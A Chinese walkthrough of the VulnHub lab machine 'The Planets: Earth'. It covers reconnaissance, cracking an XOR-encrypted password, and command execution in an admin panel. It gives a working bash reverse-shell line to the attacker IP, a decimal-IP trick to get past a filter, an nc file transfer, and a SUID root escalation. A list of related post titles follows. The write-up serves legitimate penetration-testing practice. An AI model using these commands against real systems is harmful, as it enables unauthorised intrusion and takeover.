前期准备:

靶机下载链接: https://pan.baidu.com/s/1_w8OZOPVsQaojq2rnKcdRA 提取码: gguw

kali攻击机ip:192.168.101.10

靶机地址:192.168.101.101

一、信息收集

1.nmap扫描

因为kali与靶机在同一个网段下,使用nmap 192.168.101.0/24 扫描靶机及端口

2.使用nmap -A 192.168.101.101,发现443端口有DNS解析,在hosts文件中添加DNS解析:

使用sudo vim /etc/hosts添加两个hosts文件

3.收集earth.local信息

发现有Previous Messages

Previous Messages:

37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40

3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

使用命令dirb https://earth.local扫描一下目录,发现 https://earth.local/admin 目录

进去发现是个登录界面

4.收集terratest.earth.local信息

使用命令dirb https:// terratest.earth.local扫描一下目录,发现有robots.txt文件,去查看一下

进入https://terratest.earth.local/robots.txt后,发现有个testingnotes文件,但是不知道是哪种格式

手动测试后发现是txt格式,访问testingnotes.txt

译文:

测试安全消息系统注意事项:

*使用XOR加密作为算法,在RSA中使用应该是安全的。

*地球已确认他们已收到我们发送的信息。

*testdata.txt 用于测试加密。

*terra 用作管理门户的用户名。

去做:

*我们如何安全地将每月的密钥发送到地球? 或者我们应该每周更换钥匙?

*需要测试不同的密钥长度以防止暴力破解。 钥匙应该多长时间?

*需要改进消息界面和管理面板的界面,目前非常基础。

这里我们得到了新的信息,加密算法是 XOR,并且有一个testdata.txt文档用于测试加密,用户名是terra,先访问testdata.txt并保存:

二、漏洞攻击

1.破解密码

写个简单py脚本,选一个Previous Messages数据,然后与 testdata.txt 进行一下 XOR 运算,得到密钥

Py脚本:

import binascii

data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()

print(hex(int(data1,16) ^ int(f,16)))

运行后得到以下数据

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

十六进制转文本解码一下:

密码是重复的,然后使用用户名 terra ,密码:earthclimatechangebad4humans 登录 https://earth.local/admin

2.发现user_flag

发现可以执行系统命令:

使用find命令查找flag:

发现/var/earth_web/user_flag.txt文件,查看一下:

发现flag [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

3.使用反弹shell连接到靶机

接下来编写个反弹shell:

bash -i >& /dev/tcp/192.168.101.10/1234 0>&1

发现禁止远程连接,发现需要对IP进行进制绕过:

bash -i >& /dev/tcp/3232261386/1234 0>&1

三、提权

查找有权限的命令:

find / -perm -u=s -type f 2>/dev/null

发现有个/usr/bin/ ,感觉可以提权,查看它,运行一下reset_root:

发现报错

检查是否存在重置触发器...

重置失败,所有触发器都不存在。

本地没有调试的命令,使用nc传送到本地调试一下

nc -nlvp 1234 >reset_root

nc 192.168.101.10 1234 < /usr/bin/reset_root

用strace检测问题,要注意给文件加权限命令为chmod +x ,因为没有以下三个文件而报错,查看靶机发现也没有这三个文件:

在靶机中创建这三个文件:

然后再靶机中尝试运行reset_root:

取得root权限,查找flag:

find / -name "*flag*.txt"

cat /root/root_flag.txt

cat /var/earth_web/user_flag.txt

靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH相关推荐

  1. 靶场练习第二十二天~vulnhub靶场之Momentum-2

    一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

  2. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

  3. 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

    一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...

  4. 靶场练习第十二天~vulnhub靶场之dc-4

    一.准备工作 1.靶机下载链接 链接: 百度网盘 请输入提取码 提取码: 3hq4 2.用ifconfig查看kali的ip 二.信息收集 1.nmap的信息收集 (1)主机发现 命令:nmap 19 ...

  5. vulnhub靶场{GoldenEye-v1靶场实战}

    远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...

  6. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  7. VulnHub靶场LupinOne

    VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...

  8. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  9. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

最新文章

  1. linux无法解析主机地址(could not resolve host)解决办法
  2. 获取运行端口监听的用户身份auth-owner
  3. /bin,/sbin,/usr/sbin,/usr/bin 目录区别
  4. arm优化编译参数选项解释
  5. php上传文件到七牛云源码,laravel上传文件到七牛云存储
  6. [蓝桥杯2018初赛]第几个幸运数-数论+枚举
  7. Ofbiz架构讲解与讨论(crud)
  8. JVM学习03-常用Java虚拟机参数
  9. 项目4:抽奖程序 分时间段(按时段设置的奖品数为概率)
  10. python学习笔记7-读取pdf并输出到excel
  11. Fiddler使用和数据抓包
  12. Allegro中的NET到NET之间的间距设置-网络之间的间距
  13. 方差递推公式_常见递推公式(数学)
  14. 全国计算机教学图片,全国“xx杯”计算机类说课大赛课件一等奖作品:图层蒙版教学课件.pptx...
  15. 彻底干掉霸占我任务栏的2345好压的垃圾广告搜索以及天气预告工具栏
  16. win10,win11 下部署Vicuna-7B,Vicuna-13B模型,gpu cpu运行
  17. 服务器的丢包率一般与什么有关
  18. Prolific USB-to-Serial Comm Port最新程序不支持win11怎么处理
  19. 第十七届“科大讯飞杯”题解
  20. filebeat7.7.0相关详细配置预览- processors

热门文章

  1. 一款最好用的windows文件管理器
  2. 西游记笔记与想法(3)
  3. 动态毛玻璃特效html,实现div毛玻璃背景
  4. 嵌入式C语言编程规范
  5. tof相机简介及三维坐标转化,plotly画3D点云
  6. 实例6,stc8a8k单片机开发板4脚的OLED显示数据(I2C通信)
  7. Excel常用公式大全
  8. 程序员,你需要些“脑力运动”了
  9. 水泥cement一词在英语里有时写作caement
  10. 浏览器工作流程_浏览器如何工作